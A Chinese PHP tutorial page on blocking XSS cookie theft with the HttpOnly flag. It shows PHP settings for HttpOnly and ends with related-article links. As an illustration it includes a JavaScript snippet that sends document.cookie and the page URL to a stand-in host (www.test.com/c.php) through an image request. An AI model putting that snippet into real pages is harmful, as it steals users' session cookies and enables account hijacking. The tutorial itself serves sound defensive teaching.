编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

桌面中心(三)修改数据库

Oct 09 PHP

提示Trying to clone an uncloneable object of class Imagic的解决

Oct 27 PHP

修改php.ini以达到屏蔽错误信息并记录日志

Jun 16 PHP

基于empty函数的判断详解

Jun 17 PHP

ThinkPHP自动转义存储富文本编辑器内容导致读取出错的解决方法

Aug 08 PHP

PHP使用feof()函数读文件的方法

Nov 07 PHP

浅析php创建者模式

Nov 25 PHP

使用Huagepage和PGO来提升PHP7的执行性能

Nov 30 PHP

PHP实现批量检测网站是否能够正常打开的方法

Aug 23 PHP

php实现水印文字和缩略图的方法示例

Dec 29 PHP

详解关于php的xdebug配置(编辑器vscode)

Jan 29 PHP

PHP实现PDO操作mysql存储过程示例

Feb 13 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP

You might like

让你的WINDOWS同时支持MYSQL4，MYSQL4.1,MYSQL5X

2006/12/06 PHP

检测png图片是否完整的php代码

2010/09/06 PHP

PHP新手入门学习方法

2011/05/08 PHP

如何在smarty中增加类似foreach的功能自动加载数据

2013/06/26 PHP

PHP中怎样保持SESSION不过期原理及方案介绍

2013/08/08 PHP

PHP图像处理技术实例总结【绘图、水印、验证码、图像压缩】

2018/12/08 PHP

js返回上一页并刷新的多种实现方法

2014/02/26 Javascript

js中一维数组和二位数组中的几个问题示例说明

2014/07/17 Javascript

js实现带关闭按钮始终显示在网页最底部工具条的方法

2015/03/02 Javascript

JavaScript实现表格快速变色效果代码

2015/08/19 Javascript

JS+DIV+CSS实现的经典标签切换效果代码

2015/09/14 Javascript

通过Tabs方法基于easyUI+bootstrap制作工作站

2016/03/28 Javascript

全面理解JavaScript中的继承(必看)

2016/06/16 Javascript

JavaScript中的 attribute 和 jQuery中的 attr 方法浅析

2017/01/04 Javascript

详解JavaScript中return的用法

2017/05/08 Javascript

jQuery实现选中行变色效果(实例讲解)

2017/07/06 jQuery

实现图片首尾平滑轮播(JS原生方法—节流)

2017/10/17 Javascript

vue通过路由实现页面刷新的方法

2018/01/25 Javascript

vue主动刷新页面及列表数据删除后的刷新实例

2018/09/16 Javascript

详解webpack引入第三方库的方式以及注意事项

2019/01/15 Javascript

jquery实现二级导航下拉菜单效果实例

2019/05/14 jQuery

python导入csv文件出现SyntaxError问题分析

2017/12/15 Python

python实现简易通讯录修改版

2018/03/13 Python

在pandas中遍历DataFrame行的实现方法

2019/10/23 Python

Python脚本导出为exe程序的方法

2020/03/25 Python

Steve Madden官网：美国鞋类品牌

2017/01/29 全球购物

兰蔻美国官网：Lancome美国

2017/04/25 全球购物

GafasWorld哥伦比亚：网上购买眼镜

2017/11/28 全球购物

护理专业应届毕业生推荐信

2013/11/15 职场文书

毕业生就业推荐信范文

2013/12/01 职场文书

文秘专业个人求职信

2013/12/22 职场文书

音乐器材管理制度

2014/01/31 职场文书

另类冲刺标语

2014/06/24 职场文书

珍惜时间的诗歌赏析

2019/08/23 职场文书

mybatis源码解读之executor包语句处理功能

2022/02/15 Java/Android

Python通过loop.run_in_executor执行同步代码同步变为异步

2022/04/11 Python